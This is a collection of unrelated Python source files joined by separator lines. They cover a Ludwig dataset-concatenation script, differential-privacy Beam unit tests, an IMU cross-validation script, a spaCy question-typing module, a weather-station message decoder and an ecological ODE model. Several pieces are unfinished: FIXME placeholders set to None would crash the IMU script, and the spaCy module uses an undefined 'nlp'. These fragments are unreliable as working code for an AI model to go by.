'void Foo::Bar(int x, int y, int z) {}',
],
expected_errors = [
{
'msg': "Function 'Foo::Bar' has other declaration(s) with inconsistently named parameter(s)",
'line': '3'
}
])
|
#! /usr/bin/env python
# coding=utf-8
# Copyright (c) 2019 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import argparse
import logging
import numpy as np
from ludwig.backend import LOCAL_BACKEND
from ludwig.constants import SPLIT
from ludwig.utils.data_utils import read_csv
logger = logging.getLogger(__name__)
def concatenate_csv(train_csv, vali_csv, test_csv, output_csv):
concatenated_df = concatenate_files(
train_csv, vali_csv, test_csv, read_csv, LOCAL_BACKEND
)
logger.info('Saving concatenated dataset as csv..')
concatenated_df.to_csv(output_csv, encoding='utf-8', index=False)
logger.info('done')
def concatenate_files(train_fname, vali_fname, test_fname, read_fn, backend):
df_lib = backend.df_engine.df_lib
logger.info('Loading training file...')
train_df = read_fn(train_fname, df_lib)
logger.info('done')
logger.info('Loading validation file..')
vali_df = read_fn(vali_fname, df_lib) if vali_fname is not None else None
logger.info('done')
logger.info('Loading test file..')
test_df = read_fn(test_fname, df_lib) if test_fname is not None else None
logger.info('done')
logger.info('Concatenating files..')
concatenated_df = concatenate_df(train_df, vali_df, test_df, backend)
logger.info('done')
return concatenated_df
def concatenate_df(train_df, vali_df, test_df, backend):
train_size = len(train_df)
vali_size = len(vali_df) if vali_df is not None else 0
concatenated_df = backend.df_engine.df_lib.concat(
[df for df in [train_df, vali_df, test_df] if df is not None],
ignore_index=True
)
def get_split(idx):
if idx < train_size:
return 0
if idx < train_size + vali_size:
return 1
return 2
concatenated_df[SPLIT] = concatenated_df.index.to_series().map(
get_split
).astype(np.int8)
return concatenated_df
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Concatenate train validation and test set'
)
parser.add_argument(
'-train',
'--train_csv',
help='CSV containing the training set'
)
parser.add_argument(
'-vali',
'--vali_csv',
help='CSV containing the validation set'
)
parser.add_argument(
'-test',
'--test_csv',
help='CSV containing the test set'
)
parser.add_argument('-o', '--output_csv', help='output csv')
args = parser.parse_args()
concatenate_csv(args.train_csv, args.vali_csv, args.test_csv, args.output_csv)
|
import unittest
import apache_beam as beam
from apache_beam.runners.portability import fn_api_runner
from apache_beam import pvalue
from unittest.mock import patch
import apache_beam.testing.util as beam_util
import pipeline_dp
from pipeline_dp import private_beam
from pipeline_dp import aggregate_params, budget_accounting
class SimplePrivatePTransform(private_beam.PrivatePTransform):
def expand(self, pcol):
return pcol | "Identity transform" >> beam.Map(lambda x: x)
class PrivateBeamTest(unittest.TestCase):
@staticmethod
def privacy_id_extractor(x):
return f"pid:{x}"
def test_make_private_transform_succeeds(self):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol = pipeline | 'Create produce' >> beam.Create(
[1, 2, 3, 4, 5, 6])
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
# Act
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
# Assert
self.assertIsInstance(private_collection,
private_beam.PrivatePCollection)
self.assertEqual(private_collection._budget_accountant,
budget_accountant)
def test_private_collection_with_non_private_transform_throws_error(self):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol = pipeline | 'Create produce' >> beam.Create(
[1, 2, 3, 4, 5, 6])
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
# Act and Assert
with self.assertRaises(TypeError) as context:
(private_collection | 'Non private transform on '
'PrivatePCollection' >> beam.Map(lambda x: x))
self.assertIsInstance(private_collection,
private_beam.PrivatePCollection)
self.assertTrue(
"private_transform should be of type "
"PrivatePTransform but is " in str(context.exception))
def test_transform_with_return_anonymized_disabled_returns_private_collection(
self):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol = pipeline | 'Create produce' >> beam.Create(
[1, 2, 3, 4, 5, 6])
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
# Act
transformed = private_collection | SimplePrivatePTransform(
return_anonymized=False)
# Assert
self.assertIsInstance(transformed, private_beam.PrivatePCollection)
def test_transform_with_return_anonymized_enabled_returns_pcollection(self):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol = pipeline | 'Create produce' >> beam.Create(
[1, 2, 3, 4, 5, 6])
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
# Act
transformed = private_collection | SimplePrivatePTransform(
return_anonymized=True)
# Assert
self.assertIsInstance(transformed, pvalue.PCollection)
@patch('pipeline_dp.dp_engine.DPEngine.aggregate')
def test_sum_calls_aggregate_with_params(self, mock_aggregate):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol = pipeline | 'Create produce' >> beam.Create(
[1, 2, 3, 4, 5, 6])
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
sum_params = aggregate_params.SumParams(
noise_kind=pipeline_dp.NoiseKind.GAUSSIAN,
max_partitions_contributed=2,
max_contributions_per_partition=3,
low=1,
high=5,
budget_weight=1,
public_partitions=[],
partition_extractor=lambda x: f"pk:{x // 10}",
value_extractor=lambda x: x)
# Act
transformer = private_beam.Sum(sum_params=sum_params)
private_collection | transformer
# Assert
self.assertEqual(transformer._budget_accountant, budget_accountant)
mock_aggregate.assert_called_once()
args = mock_aggregate.call_args[0]
params = pipeline_dp.AggregateParams(
noise_kind=pipeline_dp.NoiseKind.GAUSSIAN,
metrics=[pipeline_dp.Metrics.SUM],
max_partitions_contributed=sum_params.
max_partitions_contributed,
max_contributions_per_partition=sum_params.
max_contributions_per_partition,
low=sum_params.low,
high=sum_params.high,
public_partitions=sum_params.public_partitions)
self.assertEqual(args[1], params)
@patch('pipeline_dp.dp_engine.DPEngine.aggregate')
def test_count_calls_aggregate_with_params(self, mock_aggregate):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol = pipeline | 'Create produce' >> beam.Create(
[1, 2, 3, 4, 5, 6])
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
count_params = aggregate_params.CountParams(
noise_kind=pipeline_dp.NoiseKind.GAUSSIAN,
max_partitions_contributed=2,
max_contributions_per_partition=3,
budget_weight=1,
public_partitions=[],
partition_extractor=lambda x: f"pk:{x // 10}",
value_extractor=lambda x: x)
# Act
transformer = private_beam.Count(count_params=count_params)
private_collection | transformer
# Assert
self.assertEqual(transformer._budget_accountant, budget_accountant)
mock_aggregate.assert_called_once()
args = mock_aggregate.call_args[0]
params = pipeline_dp.AggregateParams(
noise_kind=pipeline_dp.NoiseKind.GAUSSIAN,
metrics=[pipeline_dp.Metrics.COUNT],
max_partitions_contributed=count_params.
max_partitions_contributed,
max_contributions_per_partition=count_params.
max_contributions_per_partition,
public_partitions=count_params.public_partitions)
self.assertEqual(args[1], params)
@patch('pipeline_dp.dp_engine.DPEngine.aggregate')
def test_privacy_id_count_calls_aggregate_with_params(self, mock_aggregate):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol = pipeline | 'Create produce' >> beam.Create(
[1, 2, 3, 4, 5, 6])
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
privacy_id_count_params = aggregate_params.PrivacyIdCountParams(
noise_kind=pipeline_dp.NoiseKind.GAUSSIAN,
max_partitions_contributed=2,
budget_weight=1,
public_partitions=[],
partition_extractor=lambda x: f"pk:{x // 10}",
value_extractor=lambda x: x)
# Act
transformer = private_beam.PrivacyIdCount(
privacy_id_count_params=privacy_id_count_params)
private_collection | transformer
# Assert
self.assertEqual(transformer._budget_accountant, budget_accountant)
mock_aggregate.assert_called_once()
args = mock_aggregate.call_args[0]
params = pipeline_dp.AggregateParams(
noise_kind=pipeline_dp.NoiseKind.GAUSSIAN,
metrics=[pipeline_dp.Metrics.PRIVACY_ID_COUNT],
max_partitions_contributed=privacy_id_count_params.
max_partitions_contributed,
max_contributions_per_partition=1,
public_partitions=privacy_id_count_params.public_partitions)
self.assertEqual(args[1], params)
def test_map_returns_correct_results_and_accountant(self):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol_input = [(1, 2), (2, 3), (3, 4), (4, 5)]
pcol = pipeline | 'Create produce' >> beam.Create(pcol_input)
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
# Act
transformed = private_collection | private_beam.Map(
fn=lambda x: x[1]**2)
# Assert
self.assertIsInstance(transformed, private_beam.PrivatePCollection)
beam_util.assert_that(
transformed._pcol,
beam_util.equal_to(
map(
lambda x:
(PrivateBeamTest.privacy_id_extractor(x), x[1]**2),
pcol_input)))
self.assertEqual(transformed._budget_accountant, budget_accountant)
def test_flatmap_returns_correct_results_and_accountant(self):
def flat_map_fn(x):
return [(x[0], x[1] + i) for i in range(2)]
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol_input = [(1, 2), (2, 3), (3, 4)]
pcol = pipeline | 'Create produce' >> beam.Create(pcol_input)
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
# Act
transformed = private_collection | private_beam.FlatMap(flat_map_fn)
# Assert
self.assertIsInstance(transformed, private_beam.PrivatePCollection)
beam_util.assert_that(
transformed._pcol,
beam_util.equal_to([('pid:(1, 2)', (1, 2)),
('pid:(1, 2)', (1, 3)),
('pid:(2, 3)', (2, 3)),
('pid:(2, 3)', (2, 4)),
('pid:(3, 4)', (3, 4)),
('pid:(3, 4)', (3, 5))]))
self.assertEqual(transformed._budget_accountant, budget_accountant)
if __name__ == '__main__':
unittest.main()
|
import argparse
import os
import logging
import yaml
import joblib
# import numpy as np
# from matplotlib import pyplot as plt
from mathtools import utils
# from seqtools import fsm
from kinemparse import imu
logger = logging.getLogger(__name__)
def main(
out_dir=None, data_dir=None, scores_dir=None,
model_name=None, model_params={},
results_file=None, sweep_param_name=None,
cv_params={}, viz_params={},
plot_predictions=None):
data_dir = os.path.expanduser(data_dir)
out_dir = os.path.expanduser(out_dir)
logger = utils.setupRootLogger(filename=os.path.join(out_dir, 'log.txt'))
if results_file is None:
results_file = os.path.join(out_dir, f'results.csv')
else:
results_file = os.path.expanduser(results_file)
fig_dir = os.path.join(out_dir, 'figures')
if not os.path.exists(fig_dir):
os.makedirs(fig_dir)
out_data_dir = os.path.join(out_dir, 'data')
if not os.path.exists(out_data_dir):
os.makedirs(out_data_dir)
def loadVariable(var_name):
return joblib.load(os.path.join(data_dir, f'{var_name}.pkl'))
def saveVariable(var, var_name):
joblib.dump(var, os.path.join(out_data_dir, f'{var_name}.pkl'))
# Load data
trial_ids = loadVariable('trial_ids')
feature_seqs = loadVariable('imu_sample_seqs')
label_seqs = loadVariable('imu_label_seqs')
if scores_dir is not None:
scores_dir = os.path.expanduser(scores_dir)
feature_seqs = tuple(
joblib.load(
os.path.join(scores_dir, f'trial={trial_id}_score-seq.pkl')
).swapaxes(0, 1)
for trial_id in trial_ids
)
# Define cross-validation folds
dataset_size = len(trial_ids)
cv_folds = utils.makeDataSplits(dataset_size, **cv_params)
metric_dict = {
'accuracy': [],
'edit_score': [],
'overlap_score': []
}
def getSplit(split_idxs):
split_data = tuple(
tuple(s[i] for i in split_idxs)
for s in (feature_seqs, label_seqs, trial_ids)
)
return split_data
for cv_index, cv_splits in enumerate(cv_folds):
train_data, val_data, test_data = tuple(map(getSplit, cv_splits))
train_ids = train_data[-1]
test_ids = test_data[-1]
val_ids = val_data[-1]
logger.info(
f'CV fold {cv_index + 1}: {len(trial_ids)} total '
f'({len(train_ids)} train, {len(val_ids)} val, {len(test_ids)} test)'
)
for name in metric_dict.keys():
value = None # FIXME
metric_dict[name] += [value]
metric_str = ' '.join(f"{k}: {v[-1]:.1f}%" for k, v in metric_dict.items())
logger.info('[TST] ' + metric_str)
d = {k: v[-1] for k, v in metric_dict.items()}
utils.writeResults(results_file, d, sweep_param_name, model_params)
test_io_history = None # FIXME
if plot_predictions:
imu.plot_prediction_eg(test_io_history, fig_dir, **viz_params)
def saveTrialData(pred_seq, score_seq, feat_seq, label_seq, trial_id):
saveVariable(pred_seq, f'trial={trial_id}_pred-label-seq')
saveVariable(score_seq, f'trial={trial_id}_score-seq')
saveVariable(label_seq, f'trial={trial_id}_true-label-seq')
for io in test_io_history:
saveTrialData(*io)
# saveVariable(train_ids, f'cvfold={cv_index}_train-ids')
# saveVariable(test_ids, f'cvfold={cv_index}_test-ids')
# saveVariable(val_ids, f'cvfold={cv_index}_val-ids')
# saveVariable(metric_dict, f'cvfold={cv_index}_{model_name}-metric-dict')
# saveVariable(model, f'cvfold={cv_index}_{model_name}-best')
if __name__ == "__main__":
# Parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('--config_file')
parser.add_argument('--out_dir')
parser.add_argument('--data_dir')
parser.add_argument('--scores_dir')
parser.add_argument('--model_params')
parser.add_argument('--results_file')
parser.add_argument('--sweep_param_name')
args = vars(parser.parse_args())
args = {k: v for k, v in args.items() if v is not None}
# Load config file and override with any provided command line args
config_file_path = args.pop('config_file', None)
if config_file_path is None:
file_basename = utils.stripExtension(__file__)
config_fn = f"{file_basename}.yaml"
config_file_path = os.path.join(
os.path.expanduser('~'), 'repo', 'kinemparse', 'scripts', config_fn
)
with open(config_file_path, 'rt') as config_file:
config = yaml.safe_load(config_file)
for k, v in args.items():
if isinstance(v, dict) and k in config:
config[k].update(v)
else:
config[k] = v
# Create output directory, instantiate log file and write config options
out_dir = os.path.expanduser(config['out_dir'])
if not os.path.exists(out_dir):
os.makedirs(out_dir)
with open(os.path.join(out_dir, config_fn), 'w') as outfile:
yaml.dump(config, outfile)
utils.copyFile(__file__, out_dir)
utils.autoreload_ipython()
main(**config)
|
# import os
# import spacy
# from spacy.attrs import IS_STOP, IS_PUNCT, IS_SPACE, IS_OOV
# from .dataset import dataset
# from .IdentifyRessource import extract_entities
# import re
# #==========================================Intialisation==================================
# nlp = spacy.load('en_core_web_sm')
# rawtext=''
# PredicatList=dataset().get_Predicates()
# # Create a list of WH questions
whquestion = ["where","when", "who"]
whenquestion =['time','date','year','month','day','hour','minute','seconds']
wherequestion=['place','location','city','country','state','town']
who='PERSON'
# #========================================FUNCTIONS============================
# def get_typed_quest(inputText):
# rawtext=inputText
# #def get_fetched_ressource
def get_Expected_Answer_type(rawtext):
doc=nlp(u""+rawtext)
for token in doc:
if token.text in whquestion:
EAT=token.text
return EAT
# def remove_stpwords_from_query(rawtext):
# doc=nlp(u""+rawtext)
# stopwords=open("stopwords.txt","w")
# for token in doc:
# if token.check_flag(IS_STOP):
# stopwords.write(token.text+"\n")
# string = r"\b{} \b".format(token.text) # il remplace aussi l'espace
# rawtext=re.sub(string ,"" ,rawtext)
# #print(rawtext)
# return rawtext.split()
# def remove_NE_from_filquest(rawtext,NamedEntityList):
# for Entity in NamedEntityList:
# if (rawtext.find(Entity)):
# rawtext=rawtext.replace(Entity,'')
# #print(rawtext)
# return rawtext
# #def exact_match(Candidate):
# #print(Candidate)
# # for key in PredicatList.keys():
# # # for c in Candidate:
# # # if c==key:
# # # print("found")
# # # else:
# # # print("not found")
# # def check_semantic_similarity(Candidate):
# # def exact_substring_match(Candidate):
# #def get_relation_identification():
|
import logging
from datetime import datetime, timedelta
import pytz
from django.db import IntegrityError
from wx.decoders.insert_raw_data import insert
from wx.models import VariableFormat, DcpMessages
tz_utc = pytz.timezone("UTC")
tz_bz = pytz.timezone("Etc/GMT+6")
ELEMENTS = {
"BATTERY": 200,
"RAINFALL": 0,
"TEMP_MAX": 16,
"TEMP_MIN": 14,
"RH": 30,
"WIND_SPEED": 50,
"WIND_DIR": 55,
"WIND_GUST": 53,
"SOLAR_RADIATION": 72,
"PRESSURE": 60
}
def parse_float(value):
try:
return float(value)
except ValueError:
return None
'''
def parse_header(header):
dcp_code = header[:8]
date = datetime.strptime(header[8:19], '%y%j%H%M%S')
failure_code = header[19:20]
signal_strength = header[20:22]
frequency_offset = header[22:24]
modulation_index = header[24:25]
data_quality = header[25:26]
channel = header[26:29]
spacecraft = header[29:30]
print()
print('dcp_code: ' + dcp_code)
print('date: ' + str(date))
print('failure_code: ' + failure_code)
print('signal_strength: ' + signal_strength)
print('frequency_offset: ' + frequency_offset)
print('modulation_index: ' + modulation_index)
print('data_quality: ' + data_quality)
print('channel: ' + channel)
print('spacecraft: ' + spacecraft)
print()
'''
def parse_line(station_id, header_date, line, interval_lookup_table, records):
fields = line.split(" ")
line_hour = int(fields[0][0:2])
line_minute = int(fields[0][2:4])
line_date = datetime(header_date.year, header_date.month, header_date.day, line_hour, line_minute)
# if hour of measurement is bigger than the transmission hour it is from the previous day
if line_hour > header_date.hour:
line_date = line_date - timedelta(days=1)
line_date = tz_utc.localize(line_date)
# line_date = line_date.astimezone(tz_bz)
values = [parse_float(f) for f in fields[1:]]
for idx, (k, v) in enumerate(list(zip(list(ELEMENTS.values())[:len(values)], values)), 1):
if v is not None:
columns = [
station_id, # station
k, # element
interval_lookup_table[str(idx)], # interval seconds
line_date, # datetime
v, # value
None, # "quality_flag"
None, # "qc_range_quality_flag"
None, # "qc_range_description"
None, # "qc_step_quality_flag"
None, # "qc_step_description"
None, # "qc_persist_quality_flag"
None, # "qc_persist_description"
None, # "manual_flag"
None, # "consisted"
False # "is_daily"
]
records.append(columns)
def read_data(station_id, dcp_address, response, err_message):
print(f'Inside NESA decoder - read_data(station_id={station_id}, dcp_address={dcp_address})')
transmissions = response.split(dcp_address)
records = []
dcp_format = 6
interval_lookup_table = {
lookup_key: seconds for (lookup_key, seconds) in VariableFormat.objects.filter(
format_id=dcp_format
).values_list('lookup_key', 'interval__seconds')
}
for transmission in transmissions[1:]:
header, *lines = transmission.split(" \r\n")
# code can't decode errors like missing transmission spot, soh skip error messages
try:
header_date = datetime.strptime(header[:11], '%y%j%H%M%S')
dcp_message = DcpMessages.create(f"{dcp_address}{header}", "\n".join(lines))
try:
dcp_message.save()
except IntegrityError:
logging.info(f"dcp_message already saved in the database: {header}")
for line in lines:
parse_line(station_id, header_date, line, interval_lookup_table, records)
except Exception as ex:
_lines = "\n".join(lines)
logging.error(f"NESA/CDP Message: Error on decode message for station_id={station_id} "
f"dcp_address={dcp_address}\nheader={header}\n"
f"lines={_lines}\n{ex}")
if records:
print('Inside NESA decoder - {0} records downloaded.'.format(len(records)))
insert(records)
else:
print('NESA DECODER - NO DATA FOUND - ' + err_message.decode('ascii'))
|
# Community III
# Two stage-structured consumer species feeding on two resources
# For units and references, see Table S1.2 in Appendix S1
# Created by Wojciech Uszko (2021)
import numpy as np
from scipy.integrate import odeint
import matplotlib.pyplot as plt
# Body masses (ng dry weight):
B_JS = 100 # small juvenile
B_AS = 1000 # small adult
B_JL = 1000 # large juvenile
B_AL = 10000 # large adult
# Temperature- or body mass-independent parameters:
deltaRS = 0.1 # small resource supply rate
deltaRL = 0.1 # large resource supply rate
q = 0 # functional response (Hill) exponent; if =0 then type II
p = 0.75 # diet preference
pASRS = p
pASRL = 1-pASRS
pJLRL = pASRS
pJLRS = 1-pASRS
betaJS = 0.6 # small juvenile conversion efficiency
betaAS = 0.6 # small adult conversion efficiency
betaJL = 0.6 # large juvenile conversion efficiency
betaAL = 0.6 # large adult conversion efficiency
HJSRS = 0.2 # half-saturation constant
HASRS = 0.2 # half-saturation constant
HASRL = 0.2 # half-saturation constant
HJLRS = 0.2 # half-saturation constant
HJLRL = 0.2 # half-saturation constant
HALRL = 0.2 # half-saturation const
zJSAS = 0.1 # small juvenile-to-adult mass ratio
zJLAL = 0.1 # large juvenile-to-adult mass ratio
muJS = 0.01 # small juvenile background mortality rate
muAS = 0.01 # small adult background mortality rate
muJL = 0.01 # large juvenile background mortality rate
muAL = 0.01 # large adult background mortality rate
# Ambient temperature (Kelvin):
T = 273.15 + 20
"""
# Temperature- or body mass-dependent parameters
# Without size-temperature interaction:
# Resource supply density:
RSmax = 0.0042 * np.exp( 0.151/(0.00008617*T) )
RLmax = RSmax
# Consumer maximum ingestion rate:
IJSRSmax = (19 * (B_JS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JS
IASRSmax = (19 * (B_AS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AS
IASRLmax = (19 * (B_AS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AS
IJLRSmax = (19 * (B_JL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JL
IJLRLmax = (19 * (B_JL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JL
IALRLmax = (19 * (B_AL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AL
# Consumer metabolic rate:
mJS = (850000000 * (B_JS**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_JS
mAS = (850000000 * (B_AS**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_AS
mJL = (850000000 * (B_JL**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_JL
mAL = (850000000 * (B_AL**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_AL
"""
# Temperature- or body mass-dependent parameters
# With size-temperature interaction in Rmax and in temperature optimum of Imax:
# Resource supply density:
RSmax = 0.0042 * np.exp( 0.151/(0.00008617*T) )
RLmax = (5.88* 10**(-7)) * np.exp( 0.37564/(0.00008617*T) )
# Consumer maximum ingestion rate:
IJSRSmax = (19 * (B_JS**(0.7)) * np.exp(-((T-(273.15+24))**2)/(2*(8**2)))) / B_JS
IASRSmax = (19 * (B_AS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AS
IASRLmax = (19 * (B_AS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AS
IJLRSmax = (19 * (B_JL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JL
IJLRLmax = (19 * (B_JL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JL
IALRLmax = (19 * (B_AL**(0.7)) * np.exp(-((T-(273.15+16))**2)/(2*(8**2)))) / B_AL
# Consumer metabolic rate:
mJS = (850000000 * (B_JS**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_JS
mAS = (850000000 * (B_AS**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_AS
mJL = (850000000 * (B_JL**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_JL
mAL = (850000000 * (B_AL**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_AL
"""
# Temperature- or body mass-dependent parameters
# With size-temperature interaction in Rmax and in metabolic rate:
# Resource supply density:
RSmax = 0.0042 * np.exp( 0.151/(0.00008617*T) )
RLmax = (5.88* 10**(-7)) * np.exp( 0.37564/(0.00008617*T) )
# Consumer maximum ingestion rate:
IJSRSmax = (19 * (B_JS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JS
IASRSmax = (19 * (B_AS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AS
IASRLmax = (19 * (B_AS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AS
IJLRSmax = (19 * (B_JL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JL
IJLRLmax = (19 * (B_JL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JL
IALRLmax = (19 * (B_AL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AL
# Consumer metabolic rate:
mJS = (850000000 * (B_JS**(0.7 + 0.0005*T)) * np.exp( -0.56/(0.00008617*T) )) / B_JS
mAS = (850000000 * (B_AS**(0.7 + 0.0005*T)) * np.exp( -0.56/(0.00008617*T) )) / B_AS
mJL = (850000000 * (B_JL**(0.7 + 0.0005*T)) * np.exp( -0.56/(0.00008617*T) )) / B_JL
mAL = (850000000 * (B_AL**(0.7 + 0.0005*T)) * np.exp( -0.56/(0.00008617*T) )) / B_AL
"""
# Specify the model:
def model(X,t):
# Variables:
RS = X[0] # small resource biomass density
RL = X[1] # large resource biomass density
JS = X[2] # small juvenile biomass density
AS = X[3] # small adult biomass density
JL = X[4] # large juvenile biomass density
AL = X[5] # large adult biomass density
# Ingestion rates:
IJSRS = ( ( 1 * (IJSRSmax/(HJSRS**(1+q))) * RS**(1+q) ) /
( 1 + (1/(HJSRS**(1+q))) * RS**(1+q) ) )
IASRS = ( ( pASRS * (IASRSmax/(HASRS**(1+q))) * RS**(1+q) + 0 * (IASRLmax/(HASRL**(1+q))) * RL**(1+q) ) /
( 1 + (pASRS/(HASRS**(1+q))) * RS**(1+q) + (pASRL/(HASRL**(1+q))) * RL**(1+q) ) )
IASRL = ( ( 0 * (IASRSmax/(HASRS**(1+q))) * RS**(1+q) + pASRL * (IASRLmax/(HASRL**(1+q))) * RL**(1+q) ) /
( 1 + (pASRS/(HASRS**(1+q))) * RS**(1+q) + (pASRL/(HASRL**(1+q))) * RL**(1+q) ) )
IJLRS = ( ( pJLRS * (IJLRSmax/(HJLRS**(1+q))) * RS**(1+q) + 0 * (IJLRLmax/(HJLRL**(1+q))) * RL**(1+q) ) /
( 1 + (pJLRS/(HJLRS**(1+q))) * RS**(1+q) + (pJLRL/(HJLRL**(1+q))) * RL**(1+q) ) )
IJLRL = ( ( 0 * (IJLRSmax/(HJLRS**(1+q))) * RS**(1+q) + pJLRL * (IJLRLmax/(HJLRL**(1+q))) * RL**(1+q) ) /
( 1 + (pJLRS/(HJLRS**(1+q))) * RS**(1+q) + (pJLRL/(HJLRL**(1+q))) * RL**(1+q) ) )
IALRL = ( ( 1 * (IALRLmax/(HALRL**(1+q))) * RL**(1+q) ) /
( 1 + (1/(HALRL**(1+q))) * RL**(1+q) ) )
# Stage-specific production rates:
vJS = betaJS*IJSRS - mJS # small juvenile production rate
gammaJS = (vJS - muJS) / (1 - zJSAS**(1-(muJS/vJS))) # maturation rate
vAS = betaAS*(IASRS+IASRL) - mAS # reproduction rate
vJL = betaJL*(IJLRS+IJLRL) - mJL # large juvenile production rate
gammaJL = (vJL - muJL) / (1 - zJLAL**(1-(muJL/vJL))) # maturation rate
vAL = betaAL*IALRL - mAL # reproduction rate
# ODE system:
dRSdt = deltaRS*(RSmax - RS) - IJSRS*JS - IASRS*AS - IJLRS*JL
dRLdt = deltaRL*(RLmax - RL) - IASRL*AS - IJLRL*JL - IALRL*AL
dJSdt = max(vAS,0)*AS + vJS*JS - max(gammaJS,0)*JS - muJS*JS
dASdt = max(gammaJS,0)*JS + min(vAS,0)*AS - muAS*AS
dJLdt = max(vAL,0)*AL + vJL*JL - max(gammaJL,0)*JL - muJL*JL
dALdt = max(gammaJL,0)*JL + min(vAL,0)*AL - muAL*AL
return np.array([dRSdt, dRLdt, dJSdt, dASdt, dJLdt, dALdt])
# Initial densities for RS, RL, JS, AS, JL, AL
X0 = np.array([0.01, 0.01, 0.01, 0.01, 0.01, 0.01])
# Time range
t = np.linspace(0,300,1000)
# Solve ODE
X = odeint(model,X0,t)
# Plot results
RS,RL,JS,AS,JL,AL = np.transpose(X)
plt.figure()
plt.plot(t, RS, 'g-', label='RS', linewidth=1.0)
plt.plot(t, RL, 'g-', label='RL', linewidth=2.5)
plt.legend(loc='upper right')
plt.xlabel('Time (day)')
plt.ylabel('Density (mg/L)')
plt.show()
plt.figure()
plt.plot(t, JS, 'k-', label='JS', linewidth=1.0)
plt.plot(t, AS, 'k-', label='AS', linewidth=2.5)
plt.legend(loc='upper right')
plt.xlabel('Time (day)')
plt.ylabel('Density (mg/L)')
